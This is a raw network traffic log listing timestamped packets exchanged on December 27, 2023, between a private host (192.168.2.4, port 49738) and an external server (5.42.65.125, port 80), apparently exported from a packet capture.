Dec 27, 2023 18:12:24.292988062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.293026924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.293747902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.293775082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.293791056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.293809891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.294490099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.294514894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.294552088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.295228004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.295260906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.295274973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.295305014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.295933008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.295968056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.295973063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.295999050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.296861887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.296875000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.296907902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.296928883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.297487020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.297498941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.297539949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.298232079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.298243999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.298273087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.298942089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.298976898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.299016953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.299690008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.299702883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.299731970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.299748898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.311348915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.311368942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.311383009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.311394930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.311413050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.311439037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.311521053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.311536074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.311574936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.313402891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.313416004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.313451052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.313472986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.313771963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.313785076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.313826084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.314368963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.314385891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.314421892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.315160990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.315174103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.315211058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.315227985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.315707922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.315722942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.315759897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.316389084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.316420078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.316432953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.316457987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.317008972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.317022085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.317048073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.317065954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.317841053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.317854881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.317866087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.317905903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.318687916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.318701982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.318732977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.318744898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.318772078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.319659948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.319677114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.319691896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.319710016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.319725037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.319739103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.320545912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.320559025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.320569992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.320589066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.320605993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.321486950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.321506023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.321517944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.321543932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.321559906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.322439909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.322527885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.322542906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.322571993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.322597980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.323577881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.323627949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.323642969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.323669910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.323695898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.325014114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.325054884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.325068951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.325093985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.325123072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.325454950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.325469017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.325483084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.325509071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.325535059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.326284885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.326298952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.326311111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.326339960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.326364040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.327234030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.327246904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.327258110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.327295065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.328073978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.328088045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.328099012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.328125000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.328141928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.328926086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.329004049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.329019070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.329047918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.329076052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.329879999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.329966068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.329977989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.330010891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.330039024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.330738068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.330781937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.330799103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.330823898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.330858946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.331651926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.331665039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.331676960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.331707001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.331733942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.332468033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.332585096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.332597971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.332631111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.332658052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.335952044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.335998058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.336015940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.336143017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.336143017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.336390972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.336467981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.336488008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.336513996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.336540937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.337271929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.337285042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.337316990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.337325096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.337358952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.338167906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.338180065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.338207006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.338208914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.338224888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.338814020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.339049101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.339088917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.339091063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.339103937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.339128017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.339143038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.340276957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.340289116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.340312958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.340327978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.340353966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.340878010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.340892076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.340902090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.340919018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.340941906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.341685057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.341697931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.341726065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.341751099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.342351913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.342370033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.342408895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.342420101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.342456102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.343364954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.343378067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.343389034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.343404055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.343430996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.344101906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.344115019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.344155073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.344158888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.344197989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.344885111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.344928026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.344930887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.344944954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.344969034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.344985962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.345736027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.345772028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.345808029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.345813990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.345853090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.346472025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.346483946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.346494913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.346508026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.346529007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.348365068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.348403931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.348416090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.348440886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.348463058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.351344109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.351356983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.351367950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.351392031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.351421118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.351901054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.352423906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.352464914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.352471113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.352498055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.352509022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.352511883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.352538109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.352551937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.353003025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.353014946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.353048086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.353050947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.353086948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.353137016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.353157043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.353168011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.353182077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.353193045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.353214025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.353590965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.353605032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.353627920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.353641033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.353662968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.353986025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.354027033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.354085922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.354098082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.354123116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.354149103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.354386091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.354430914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.354443073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.354481936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.355181932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.355195045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.355221987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.355249882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.355722904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.355782032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.355794907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.355820894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.355849981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.356499910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.356517076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.356528997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.356554031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.356580019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.357202053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.357250929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.357263088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.357290030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.357315063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.357997894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.358011007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.358036041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.358043909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.358073950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.360536098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.360577106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.360589027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.360596895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.360625982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.361654997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.361668110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.361677885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.361705065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.361717939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.361733913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.361746073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.361757040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.361785889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.361809969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.362420082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.362432957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.362442970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.362462997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.362488985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.364145994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.364198923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.364211082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.364239931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.364264965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.364492893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.364504099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.364514112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.364537001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.364562035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.365195036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.365216970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.365230083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.365257978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.365273952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.366004944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.366018057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.366028070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.366049051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.366074085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.367525101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.367538929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.367577076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.367608070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.367645025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.367784977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.367821932 CET	80	49738	5.42.65.125	192.168.2.4
